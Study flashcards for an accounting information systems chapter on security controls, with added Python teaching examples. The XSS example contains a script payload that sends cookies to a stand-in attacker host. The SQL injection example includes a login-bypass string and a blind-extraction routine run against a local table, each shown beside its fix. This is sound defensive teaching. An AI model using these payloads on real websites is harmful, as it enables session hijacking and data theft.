AIS Chapter 11
Corrective Controls: Computer Incident response team: The CIRT should lead the organization's incident response process through four steps, what are they?
1. Recognition that a problem exists 2. Containment of the problem 3. Recovery 4. Follow-up
Management has to make sure the organization is in compliance with both regulatory (legal) and industry standards. What 5 laws and standards are listed?
1. Sarbanes-Oxley Act (SOX) 2. Health Insurance Portability and Accountability Act (HIPAA) 3. Health Information Technology for Economic and Clinical Health Act (HITECH) 4. EU's General Data Protection Regulation (GDPR) 5. Payment Card Industry Data Security Standard (PCI DSS)
Trust services framework: What are the five basic principles that contribute to systems reliability? Describe each.
1. Security (foundation) - access to the system and its data is controlled and restricted to legitimate users. 2. Confidentiality (pillar) - sensitive organizational information is protected from unauthorized disclosure. 3. Privacy (pillar) - personal information about customers (e.g., collected through e-commerce) is collected, used, disclosed, and maintained in an appropriate manner. 4. Processing integrity (pillar) - data are processed completely, validly, accurately, in a timely manner, and only with proper authorization, so that the system fully satisfies the entity's objectives. 5. Availability (pillar) - the system is available to meet operational and contractual obligations. *The foundation, along with the 4 pillars, holds up systems reliability (the roof) of the Trust Services Framework.
What are the three fundamental information security concepts?
1. Security as a management issue, not a technology issue. 2. People are the critical factor 3. Defense in depth & time-based model of security.
Senior management's involvement in the security environment can help overcome problems with what 2 things?
1. Separate silos in the organization who do not communicate well with each other 2. Turf battles between different functions and departments
Corrective Controls: Designation of a specific individual with organization-wide responsibility for security: State 3 characteristics about a chief information security officer (CISO).
1. Should be independent of other IS functions and report to either the COO or CEO. 2. Must understand the company's technology environment and work with the CIO to design, implement, and promote sound security policies and procedures. 3. Should impartially assess and evaluate the IT environment, conduct vulnerability and risk assessments, and audit the CIO's security measures.
Preventative controls: User Access Controls:Users can be authenticated by verifying... (3 things)
1. Something they know, such as passwords or PINs. 2. Something they have, such as smart cards or ID badges. 3. Some physical characteristic (biometric identifier), such as fingerprints, voice, typing pattern.
Ch 11 focuses on - Ch 12 focuses on - Ch 13 focuses on -
11 - Security (foundation) 12 - Confidentiality & Privacy (pillars) 13 - Processing integrity & Availability (pillars)
Preventative controls: IT Solutions: Device and software hardening: What is a patch
A code released by software developers to fix vulnerabilities that have been discovered.
Detective Controls: HoneyPots: Describe HoneyPots
A decoy system, made to look like a legitimate part of the computer system, used to provide early warning that an insider or outsider is attempting to search for confidential information. Because no legitimate work takes place on it, any access to it is suspicious.
Preventative controls: IT Solutions: Encryption: What 2 things are needed to encrypt and decrypt
A key and an algorithm
Corrective Controls: Computer Incident response team: What are computer incident response teams and who should be included in them?
A key component of being able to respond to security incidents promptly and effectively. The CIRT is responsible for dealing with major incidents. It should include technical specialists and senior operations management.
Preventative controls: IT Solutions: Device and software hardening: Why is software design important in this respect?
Because the organization's own software, especially applications exposed to clients and the Internet, may be the most vulnerable part of the computer system. Software must be designed and tested to resist attacks such as cross-site scripting, SQL injection, and buffer overflows.
Preventative controls: User Access Controls: ________________ are probably the most commonly used authentication method and also the most controversial.
Passwords
Preventative controls: IT Solutions: Device and software hardening: Why is patch management challenging?
Patches can have unanticipated side effects that cause problems, which means they should be tested before being deployed.
People are the critical factor: _____________ are often the weakest link in the information security of a company.
People
What 3 major types of preventative controls are used for defense in depth? (Describe each)
1. Physical security: access controls. 2. Process (user access controls): authentication controls; authorization controls. 3. IT solutions: antimalware controls; network access controls; device and software hardening controls; encryption.
Time-based model of security: What 3 controls does the time-based model of security focus on implementing, and why?
Preventive, detective, and corrective controls. Together they enable an organization to recognize that an attack is occurring and take steps to thwart it before any assets have been compromised.
Preventative controls: User Access Controls: What are authorization controls?
Process of restricting access of authenticated users to specific portions of the system and specifying what actions they are permitted to perform.
Monitoring: Penetration testing: What is penetration testing?
Provides a rigorous way to test the effectiveness of an organization's information security. This testing involves an authorized attempt by either an internal audit team or external security consulting firm to break into the organization's IS.
What is cloud computing? And what are the 3 versions?
Remotely accessing computer resources over the Internet. The three versions are: 1. Software applications 2. Data storage 3. Hardware
Preventative controls: IT Solutions: Encryption: What is decryption?
Reverses encryption.
Preventative controls: IT Solutions: Network access controls: What is a demilitarized Zone (DMZ)?
Separate network that permits controlled access from the Internet to selected resources
Preventative controls: IT Solutions: Network access controls: What is a firewall?
Software or hardware used to filter information based on packet data.
Preventative controls: User Access Controls: Limitations of biometric techniques.
Some techniques, like fingerprints, carry negative connotations that hinder acceptance. Readers can be spoofed or simply fail to recognize the user (e.g., a phone face scan). Unlike a password, a biometric cannot be changed: if the stored template is compromised, the attacker has your fingerprint permanently.
Preventative controls: User Access Controls: What is an access control matrix?
Specifies what part of the information system a user can access and what actions they are permitted to perform. When an employee tries to access a particular resource, the system performs a compatibility test that matches the user's authentication credentials against the matrix to determine if the action should be allowed.
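The compatibility test described above, as an added example in Python (not code from the textbook). The users, passwords, resources, and rights are constructed for illustration; a real system would store the matrix in a database and use a slow password hash such as bcrypt or Argon2 rather than plain salted SHA-256.

```python
import hashlib
import hmac
import os

# Constructed credential store (not from the textbook): username -> (salt, hash).
# Passwords are never stored in the clear; we keep a salted SHA-256 digest.
def _hash_password(salt: bytes, password: str) -> bytes:
    return hashlib.sha256(salt + password.encode("utf-8")).digest()


def _new_user(password: str):
    salt = os.urandom(16)
    return salt, _hash_password(salt, password)


USERS = {
    "alice": _new_user("correct horse battery staple"),
    "bob": _new_user("hunter2"),
}

# Constructed access control matrix: rows are users, columns are resources,
# and each cell lists the actions that user may perform on that resource.
# A missing cell means no access at all.
MATRIX = {
    "alice": {"payroll_db": {"read", "update"}, "gl_ledger": {"read"}},
    "bob": {"gl_ledger": {"read", "update", "delete"}},
}


def authenticate(username: str, password: str) -> bool:
    """Verify identity with something the user knows. Returns True on success."""
    entry = USERS.get(username)
    if entry is None:
        # Hash anyway so an unknown user takes about as long as a wrong password.
        _hash_password(b"\x00" * 16, password)
        return False
    salt, expected = entry
    # Constant-time comparison so the check does not leak how many bytes matched.
    return hmac.compare_digest(_hash_password(salt, password), expected)


def authorize(username: str, resource: str, action: str) -> bool:
    """Compatibility test: look up the user's row and check the action is in the cell."""
    return action in MATRIX.get(username, {}).get(resource, set())


def request_access(username: str, password: str, resource: str, action: str) -> str:
    """Authentication first, then authorization; deny unless both pass."""
    if not authenticate(username, password):
        return "denied: authentication failed"
    if not authorize(username, resource, action):
        return "denied: not authorized"
    return "allowed"


if __name__ == "__main__":
    print(request_access("alice", "correct horse battery staple", "payroll_db", "read"))
    print(request_access("alice", "correct horse battery staple", "payroll_db", "delete"))
    print(request_access("bob", "hunter2", "payroll_db", "read"))
```

Note the order: the matrix is only consulted after the credentials check out, and a user with no row (or no cell for the resource) is denied by default rather than allowed.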
What are the 4 steps of the Security life cycle?
Step 1: Assess the information security risks. Step 2: Develop information security policies and communicate them to employees. Step 3: Acquire or build specific technological tools. Step 4: Monitor the performance of the organization's information security program.
Preventative controls: IT Solutions: Encryption: Hashing: What is a merkle tree?
Each text (e.g., a transaction) is hashed; then pairs of hashes are concatenated and hashed again, and this continues level by level until a single hash remains at the top, called the root hash. If any earlier transaction is changed, its hash changes and so does every hash above it, including the root hash, so tampering is detected by comparing root hashes.
Preventative controls: IT Solutions: Encryption: Hashing: What is hashing?
Takes plaintext of any length and transforms it into a short code called a hash.
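Hashing and the Merkle tree from the two cards above, as an added Python example (not code from the textbook). The transaction list is constructed; the odd-node convention (duplicating the last hash on a level) is an assumption borrowed from Bitcoin, and other Merkle constructions pad differently.

```python
import hashlib
from typing import List


def sha256_hex(data: bytes) -> str:
    """Hash input of any length to a fixed-length 256-bit digest (64 hex characters)."""
    return hashlib.sha256(data).hexdigest()


def merkle_root(leaves: List[bytes]) -> str:
    """Compute the root hash of a Merkle tree over the given transactions.

    Every leaf is hashed, then adjacent pairs of hashes are concatenated and
    hashed again, level by level, until one hash remains: the root hash.
    A level with an odd number of nodes duplicates its last node so that
    every node has a partner (the convention used by Bitcoin).
    """
    if not leaves:
        raise ValueError("a Merkle tree needs at least one leaf")
    level = [sha256_hex(leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2 == 1:
            level.append(level[-1])
        level = [
            sha256_hex((level[i] + level[i + 1]).encode("ascii"))
            for i in range(0, len(level), 2)
        ]
    return level[0]


# Constructed transaction log (not real data).
TRANSACTIONS = [
    b"tx1: alice pays bob 100",
    b"tx2: bob pays carol 40",
    b"tx3: carol pays dave 15",
    b"tx4: dave pays alice 5",
    b"tx5: alice pays carol 20",
]


def tampering_detected(original: List[bytes], modified: List[bytes]) -> bool:
    """True when the two logs hash to different root hashes."""
    return merkle_root(original) != merkle_root(modified)


if __name__ == "__main__":
    root = merkle_root(TRANSACTIONS)
    print("root hash:", root)
    altered = list(TRANSACTIONS)
    altered[1] = b"tx2: bob pays carol 4000"  # two digits added to one transaction
    print("tampered root:", merkle_root(altered))
    print("tampering detected:", tampering_detected(TRANSACTIONS, altered))
```

Whatever the size of the input, the digest is always 64 hex characters, and there is no function to recover a transaction from its hash; that is the one-way property that separates hashing from encryption.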
Preventative controls: User Access Controls:What are 2 related functions in Process: User Access Controls? Describe each.
1. Authentication Focuses on verifying the identity of the person or device attempting to gain access. 2. Authorization Restricts access of authenticated users to specific portions of the system and specifies what actions they are permitted to perform.
People are the critical factor: What 3 things should management do to create a security aware culture:
1. Communicate security Policies 2. Lead by example 3. Continuous security awareness training
Monitoring: Change Controls and Change Management: What are 5 requirements of good change management and control?
1. Documentation 2. Approval 3. Testing 4. Develop "backout" plan (revert to previous version) 5. Monitoring
Corrective Controls: Two key components that satisfy the basic principals of response (corrective controls) are:
1. Establishment of a computer Incident response team (CIRT) 2. Designation of a specific individual with organization-wide responsibility for security.
People are the critical factor: While training employees about security measures, explain critically what 2 things?
1. How to follow company security policies (especially for new employees) 2. Why security measures are important
Preventative controls: Physical Security: What are 7 types of physical security access controls
1. Limit entry to the building (fire doors should be one way and alarmed) 2. Restrict access to the network and data 3. Limit access to servers 4. Secure laptops and hard drives 5. Restrict access to network wiring 6. Restrict access to network printers 7. Integrate physical controls with logical controls (a user can only log in if they have been "swiped in" through building security)
What are 4 major types of detective controls used for defense in depth?
1. Log analysis 2. Intrusion detection systems 3. Honeypots 4. Continuous Monitoring
Preventative controls: IT Solutions: Antimalware Controls: Name six antimalware controls.
1. Malicious software awareness education 2. Installation of antimalware protection tools on all devices 3. Centralized management of patches and updates to antimalware software 4. Regular review of new malware threats 5. Filtering of incoming traffic to block potential sources of malware 6. Training employees not to install shared or unapproved software
Monitoring: What are the 2 ways that monitoring remedies any deficiencies?
1. Penetration Testing 2. Change Control and Change Management
People are the critical factor: What are 6 common issues when training employees?
1. Phishing scams (Spear Phishing) 2. Unsafe email attachments 3. Locking Computers 4. Understanding Social Engineering Attacks -Never divulge passwords, workstation details, network configurations, etc. 5. Don't allow Piggybacking through doors 6. Training technical support staff on new issues
What 3 controls does this chapter boil down to and what do these controls do?
1. Preventative controls - PROTECTION 2. Dectective Controls - DETECTION 3. Corrective Controls - RESPONSE
Preventative controls: IT Solutions: Device and software hardening: Software design: What is Cross site scripting? Give an example.
A vulnerability in which a website fails to sanitize input, so attacker-supplied script is sent to visitors' browsers as part of a trusted page and runs with the victim's session. Example: you are logged into your bank and click a link that injects the attacker's code into a bank page; the code can read your session and act on your behalf, so the attacker is effectively logged into your bank account too.
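The defect beside its fix, as an added Python example (not code from the textbook): two render functions insert user input into a page without escaping, two escape it with the standard library. The payloads are constructed, and attacker.example is a reserved documentation domain, not a real host.

```python
import html

# Constructed attacker payloads (example only).
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/steal?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_comment_vulnerable(comment: str) -> str:
    """Inserts user input straight into the page: any HTML in it becomes live markup."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser shows the text instead of running it."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_search_box_vulnerable(term: str) -> str:
    """Reflects the search term into an attribute value without escaping."""
    return f'<input type="text" name="q" value="{term}">'


def render_search_box_safe(term: str) -> str:
    """quote=True matters here: an unescaped double quote would end the attribute."""
    return f'<input type="text" name="q" value="{html.escape(term, quote=True)}">'


def contains_live_script(fragment: str) -> bool:
    """Crude check: does the fragment contain an unescaped script tag or event handler?"""
    lowered = fragment.lower()
    return "<script" in lowered or 'onfocus="' in lowered


if __name__ == "__main__":
    print(render_comment_vulnerable(SCRIPT_PAYLOAD))
    print(render_comment_safe(SCRIPT_PAYLOAD))
    print(render_search_box_vulnerable(ATTRIBUTE_PAYLOAD))
    print(render_search_box_safe(ATTRIBUTE_PAYLOAD))
```

The second pair shows why "strip <script>" is not a fix: in an attribute context the payload needs no tag at all, only a quote to break out and an event handler. Escaping for the exact context where the data lands is the rule.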
Preventative controls: IT Solutions: Encryption: Hashing: What is a digital certificate?
An electronic document, created and digitally signed by a trusted third party Provide an automated method for obtaining an organization's or individual's public key
Preventative controls: IT Solutions: Device and software hardening: Software design: What is SQL injection?
Attackers enter SQL commands in an input field (for example, a login form) that the application concatenates into a database query without validation, so the database executes the attacker's commands and they can read, change, or delete data. In the "blind" form the attacker asks the database a series of true/false questions and reconstructs the data by a process of elimination.
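Both forms of the attack from the card above, as an added Python example (not code from the textbook) against a constructed in-memory SQLite table: a login query built by string formatting leaks every row, the blind variant recovers a stored value one character at a time, and the parameterised version is immune to both.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash_a", "clerk"), ("bob", "hash_b", "admin")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password_hash: str):
    """Builds the query by string formatting, so user input becomes part of the SQL."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return sorted(conn.execute(query).fetchall())


def login_safe(conn, username: str, password_hash: str):
    """Parameterised query: values travel separately and are never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return sorted(conn.execute(query, (username, password_hash)).fetchall())


def blind_probe(conn, position: int, guess: str) -> bool:
    """Ask the vulnerable query one yes/no question about bob's stored hash."""
    payload = f"bob' AND substr(password_hash, {position}, 1) = '{guess}' --"
    return len(login_vulnerable(conn, payload, "irrelevant")) > 0


def blind_extract(conn, length: int, alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789_") -> str:
    """Recover bob's hash character by character, by elimination over the alphabet."""
    recovered = ""
    for position in range(1, length + 1):
        for guess in alphabet:
            if blind_probe(conn, position, guess):
                recovered += guess
                break
        else:
            break  # no character matched: stop rather than return a wrong answer
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal login:      ", login_safe(db, "alice", "hash_a"))
    print("injected, vulnerable:", login_vulnerable(db, "' OR 1=1 --", "x"))
    print("injected, safe:      ", login_safe(db, "' OR 1=1 --", "x"))
    print("blind extraction:    ", blind_extract(db, 6))
```

The `--` in each payload turns the rest of the application's query into a comment, which is why the password check never runs. The safe version needs no input filtering at all: the driver binds the values, so a quote in the username is just a quote.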
Preventative controls: IT Solutions: Device and software hardening: Software design: What are buffer overflows?
Attackers send more data than the program's input buffer can hold. The excess overwrites adjacent memory, which either crashes the software or, if the extra data is crafted carefully, gets the program to execute attacker-supplied commands along with the legitimate data.
Preventative controls: IT Solutions: Device and software hardening: What are script kiddies?
Unskilled attackers who simply run exploit programs that others have written and published, rather than discovering vulnerabilities themselves.
Why is security the foundation of systems reliability? What two things does it protect?
Because it restricts system access to only authorized users and thereby protects: 1. The confidentiality of sensitive organizational data. 2. The privacy of personal identifying information collected from customers.
How do security procedures provide for processing integrity?
By preventing: 1. Submission of unauthorized or fictitious transactions. 2. Unauthorized changes to stored data or programs.
Security as a management issue, not a technology issue: SOX Sec. 302 States:
CEO and the CFO responsible to certify that the financial statements fairly present the results of the company's activities.
Corrective Controls: __________ specifies the need to identify and handle security incidents.
COBIT
Preventative controls: User Access Controls: Limitations of passwords.
Can be guessed, lost, written down, or given away.
Preventative controls: IT Solutions: Device and software hardening: What are vulnerability scanners?
Automated tools that probe systems and software for known weaknesses, such as missing patches, default accounts, and insecure configurations, so they can be fixed before an attacker finds them.
Preventative controls: IT Solutions: Device and software hardening: What are endpoints?
Collective term for the workstations, servers, printers, and other devices that comprise an organization's network.
Preventative controls: IT Solutions: Network access controls: What is a border router?
Connects an organization's information system to the Internet and routes packets of data using the source and destination address information in each packet's header.
Preventative controls: User Access Controls: Limitations of Physical Identitfication Techniques.
Physical identification techniques include cards, badges, USB devices, and cell phones. These can be lost, stolen, or duplicated.
Detective Controls: Intrusion detection systems: Describe an intrusion detection system (IDS).
Detects unusual behavior. Creates a log of network traffic that was permitted to pass the firewall and analyzes it for signs of attempted or successful intrusion. Represents an attempt to automate part of the monitoring, so it is faster than manual log analysis. Alerts staff that they need to act when something is outside the normal range.
What is the internet of things?
Devices that connect to the Internet or a network, such as sensors, cameras, phones, coffee makers, and even litter boxes.
Preventative controls: IT Solutions: Encryption: Asymmetric encryption and hashing are used to create ____________.
Digital signatures
Preventative controls: IT Solutions: Encryption: What specific transactions do encryption play an essential role in verifying the validity of?
E-business transactions
Preventative controls: User Access Controls: Describe media access control
Each network device has a unique identifier, referred to as its MAC address. It is possible to restrict network access to only those devices that have a recognized MAC address, or to use MAC addresses for authorization. Caveat: a device's MAC address can be changed in software (spoofed), so this should not be the only control.
Preventative controls: IT Solutions: Encryption: Hashing: Give 2 ways that encrypting and hashing are different.
Encryption always produces ciphertext similar in length to the plaintext, but hashing produces a hash of a fixed short length. Encryption is reversible, but hashing is not; you cannot transform a hash back into its original plaintext.
Detective Controls: Why are detective contols in place?
To enhance security. Preventive controls are never 100% effective in blocking all attacks, so the organization needs to detect incidents in which preventive controls have been circumvented.
Monitoring: Change Controls and Change Management: What is change controls and change management?
Formal process used to ensure that modifications to hardware, software, or processes do not reduce systems reliability
Preventative controls: IT Solutions: Device and software hardening: What are exploits?
Programs or step-by-step instructions that take advantage of a known vulnerability. Hackers usually publish them on the Internet, so an unpatched system can be attacked by anyone who downloads the exploit.
Preventative controls: User Access Controls: What is dynamic authorization?
Identifier changes either as a result of an event such as connecting to a network or over time. Employee is only authorized to perform a specific task for a transaction when they are talking with a particular customer.
Preventative controls: User Access Controls: What is static authorization
Identifier does not change over time.
Time-based model of security: Describe Detective controls
Identify when preventive controls have been breached.
Preventative controls: IT Solutions: Encryption: Hashing: What is a digital signature?
A hash of a document encrypted with the creator's private key. It can only be decrypted with the corresponding public key; the recipient decrypts it and compares the result with their own hash of the document, which proves who signed it and that the document was not altered.
COBIT addresses...
Information technology internal controls
Detective Controls: Log analysis: What is a major weakness of log analysis?
It is labor intensive and prone to human error
Time-based model of security: Describe preventative controls
Limit actions to those in accord with the organization's security policy and disallows all others.
Detective Controls: Log analysis: Why is it important to audit the audit trail of a log?
Logs form an audit trail of system access, so an attacker who gets in will try to cover their tracks. Need to check whether the log itself was deleted or modified.
What is meant by, "Security as a management issue, not a technology issue?"
Management is responsible for the internal controls around a company
Detective Controls: Monitoring: Describe monitoring.
Management should monitor both employee compliance with the organization's information security policies and overall performance of business processes.
Preventative controls: IT Solutions: Device and software hardening: What is hardening?
Many hardware and software applications ship with default passwords and settings. -The changing of these settings upon installation so hackers cannot easily use the default user accounts and passwords to gain entry to the system.
What is the fourth stage in the security life cycle?
Monitoring
Preventative controls: IT Solutions: Network access controls: Describe Intrusion Prevention System (IPS).
Monitors patterns in the traffic flow, rather than only inspecting individual packets, to identify and automatically block attacks
Detective Controls: Log analysis: Describe log analysis.
Most systems come with extensive capabilities for logging who accesses the system and what specific actions each user performed. Log analysis is the process of examining logs to monitor security.
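Log analysis and the intrusion detection idea from the earlier IDS card, as an added Python example (not code from the textbook). The log lines and their format are constructed; the detection rule (five failed logins from one source inside any two-minute window, then a success from that source) is an assumption chosen for illustration, and a real IDS would tune both numbers.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log, not from any real system. One line is
# deliberately in a different format to show that the parser skips it.
LOG_LINES = """\
2024-03-01T08:00:01 user=alice event=login result=failure src=10.0.0.5
2024-03-01T08:00:05 kernel: eth0 link up
2024-03-01T08:00:09 user=alice event=login result=success src=10.0.0.5
2024-03-01T08:00:10 user=bob event=login result=failure src=203.0.113.7
2024-03-01T08:00:14 user=bob event=login result=failure src=203.0.113.7
2024-03-01T08:00:19 user=bob event=login result=failure src=203.0.113.7
2024-03-01T08:00:25 user=bob event=login result=failure src=203.0.113.7
2024-03-01T08:00:31 user=bob event=login result=failure src=203.0.113.7
2024-03-01T08:00:40 user=bob event=login result=success src=203.0.113.7
2024-03-01T08:30:00 user=carol event=login result=failure src=10.0.0.9
2024-03-01T08:45:00 user=carol event=login result=failure src=10.0.0.9
2024-03-01T09:10:00 user=carol event=login result=failure src=10.0.0.9
2024-03-01T09:30:00 user=carol event=login result=failure src=10.0.0.9
2024-03-01T09:50:00 user=carol event=login result=failure src=10.0.0.9
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) event=(?P<event>\S+) "
    r"result=(?P<result>\S+) src=(?P<src>\S+)$"
)


def parse_log(lines):
    """Turn raw lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"])
        events.append(e)
    return events


def detect_brute_force(events, threshold=5, window=timedelta(minutes=2)):
    """Flag (user, source) pairs with >= threshold failed logins inside one sliding window."""
    failures = defaultdict(list)
    for e in events:
        if e["event"] == "login" and e["result"] == "failure":
            failures[(e["user"], e["src"])].append(e["ts"])
    alerts = []
    for (user, src), times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1  # slide the window forward until it fits
            if end - start + 1 >= threshold:
                alerts.append({"user": user, "src": src,
                               "count": end - start + 1, "last_failure": times[end]})
                break
    return alerts


def detect_success_after_burst(events, alerts):
    """A success from the same source right after a burst suggests the guessing worked."""
    suspects = []
    for a in alerts:
        for e in events:
            if (e["user"] == a["user"] and e["src"] == a["src"]
                    and e["event"] == "login" and e["result"] == "success"
                    and e["ts"] >= a["last_failure"]):
                suspects.append((a["user"], a["src"], e["ts"].isoformat()))
                break
    return suspects


if __name__ == "__main__":
    evs = parse_log(LOG_LINES)
    found = detect_brute_force(evs)
    print("brute-force alerts:", found)
    print("possible compromises:", detect_success_after_burst(evs, found))
```

Carol also has five failures, but spread over nearly two hours, so the sliding window never holds more than one and she is not flagged; that is the difference between counting events and looking at patterns in time, and it is also why the log being complete and unmodified matters before any of this analysis is trusted.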
Preventative controls: User Access Controls: Which is stronger, multi-factor or multi-modal?
Multi-factor
What is Virtualiztion? And who are super users?
Multiple "virtual computer" systems are run on one large powerful computer Super Users (Administrators) can access all of the virtual systems
Preventative controls: User Access Controls: What is Multi-Modal Authentication? Provide 2 examples.
Using multiple credentials of the same type. 1. Face and voice 2. Username and password
Cloud computing often uses __________________.
Virtualization
Preventative controls: IT Solutions: Device and software hardening: What is patch management and the what are the 4 things that need to have the latest updates installed in them?
The process for regularly applying patches and updates to all of an organization's software, including: 1. Antivirus software 2. Firewalls 3. Operating systems 4. Application programs
Preventative controls: IT Solutions: Encryption: What is encryption?
The process of transforming normal text, called plaintext, into unreadable gibberish, called ciphertext.
Preventative controls: User Access Controls: What are Multi-factor authentication? Provide 2 examples.
The use of two or three different types of credentials. 1. Palm print and a PIN 2. Swipe card and a PIN
Security procedures protect against...
a variety of attacks, including viruses and worms, thereby ensuring the system is available when needed.
Preventative controls: User Access Controls: Every workstation, printer, or other computing device needs a _______ _________ _______ to connect to the organization's network.
network interface card (NIC)
The _____________ of an organization's financial statements depends upon the ________________ of its information systems.
accuracy, reliability
What is the Trust Services Framework?
Developed by the AICPA and the CICA (Canadian Institute of Chartered Accountants); relates to systems reliability (security, confidentiality, privacy, processing integrity, availability). A set of principles for assessing the risks and opportunities associated with the information security of an organization.
Preventative controls: IT Solutions: Network access controls: What are 2 things that both border routers and firewalls use? Describe each.
1. Packet filtering - decides which packets get in by examining fields in the packet header (addresses, protocol, ports). 2. Access control lists (ACLs) - sets of rules that specify what to do with arriving packets.
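A stateless packet filter driven by an ACL, as an added Python example (not code from the textbook). The networks, hosts, and rules are constructed: 10.0.0.0/8 stands for the internal LAN and two hosts in 192.0.2.0/24 (a documentation range) stand for a web server and a mail relay in the DMZ. It filters individual packets only; the pattern-based blocking of an IPS is a separate layer.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    proto: str   # "tcp", "udp" or "icmp"
    src: str     # source IP address
    dst: str     # destination IP address
    dport: int   # destination port (0 for protocols without ports)


@dataclass(frozen=True)
class Rule:
    action: str                    # "permit" or "deny"
    proto: str                     # protocol, or "any"
    src: ipaddress.IPv4Network     # source address range
    dst: ipaddress.IPv4Network     # destination address range
    dport: Optional[int]           # destination port, or None for any port

    def matches(self, pkt: Packet) -> bool:
        return (
            (self.proto == "any" or self.proto == pkt.proto)
            and ipaddress.ip_address(pkt.src) in self.src
            and ipaddress.ip_address(pkt.dst) in self.dst
            and (self.dport is None or self.dport == pkt.dport)
        )


ANY = ipaddress.ip_network("0.0.0.0/0")
INTERNAL = ipaddress.ip_network("10.0.0.0/8")      # constructed: internal LAN
DMZ_WEB = ipaddress.ip_network("192.0.2.10/32")    # constructed: public web server in the DMZ
DMZ_MAIL = ipaddress.ip_network("192.0.2.25/32")   # constructed: mail relay in the DMZ

# Inbound ACL on the Internet-facing interface. Rules are evaluated top to
# bottom and the first match wins; a packet that matches nothing is dropped.
INBOUND_ACL = [
    Rule("deny", "any", INTERNAL, ANY, None),   # anti-spoofing: internal addresses never arrive from outside
    Rule("permit", "tcp", ANY, DMZ_WEB, 443),   # HTTPS to the public web server
    Rule("permit", "tcp", ANY, DMZ_MAIL, 25),   # SMTP to the mail relay
    Rule("deny", "any", ANY, INTERNAL, None),   # nothing from the Internet straight into the LAN
]


def filter_packet(pkt: Packet, acl=INBOUND_ACL) -> str:
    """Return the action of the first matching rule, or the implicit deny."""
    for rule in acl:
        if rule.matches(pkt):
            return rule.action
    return "deny"


if __name__ == "__main__":
    for p in (
        Packet("tcp", "198.51.100.4", "192.0.2.10", 443),   # web visitor
        Packet("tcp", "198.51.100.4", "192.0.2.10", 22),    # SSH to the web server
        Packet("tcp", "10.1.2.3", "192.0.2.10", 443),       # spoofed internal source
        Packet("tcp", "198.51.100.4", "10.0.0.7", 443),     # straight to the LAN
    ):
        print(p, "->", filter_packet(p))
```

Rule order is part of the policy: the anti-spoofing deny sits first so that a forged internal source address can never reach a later permit, and the implicit deny at the end is what makes the list a whitelist rather than a blacklist.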
Preventative controls: IT Solutions: What are the four components of IT Solutions?
1. Antimalware controls 2. Network access controls 3. Device and software hardening controls 4. Encryption
What are 2 major types of Corrective controls used for defense in depth?
1. Computer incident response teams (CIRT) 2. Chief Information Security Officer (CISO)
What are 5 things that all virtual machines share?
1. Hard drive 2. Motherboard 3. Disk drives 4. Printers 5. Network
Time-based model of security: How are the variables evaluated?
If P > (D + R), then security procedures are effective. Otherwise, security is ineffective.
Detective Controls: What are 4 components of detective controls?
1. Log analysis 2. Intrusion detection systems 3. Honeypots 4. Monitoring
Time-based model of security: The time-based model evaluates the effectiveness of an organization's security by measuring and comparing the relationship among what three variables? (Describe each)
P = time it takes an attacker to break through the organization's preventive controls. D = time it takes to detect that an attack is in progress. R = time to respond to the attack.
Corrective Controls: Two of the Trust Services framework criteria for effective security are the existence of procedures to:
1. React to system security breaches and other incidents. 2. Take corrective action on a timely basis.
Time-based model of security: Describe Corrective (response) controls
1. Repair damage from problems that have occurred. 2. Improve preventive and detective controls to reduce the likelihood of similar incidents.
What is the idea of defense in depth? What are 4 characteristics of it?
The idea of defense-in-depth is to employ multiple layers of controls to avoid having a single point of failure. 1. No control is 100% effective 2. Overlapping, complementary, and redundant controls help 3. If one layer fails, another may function as planned 4. The formula is not an exact science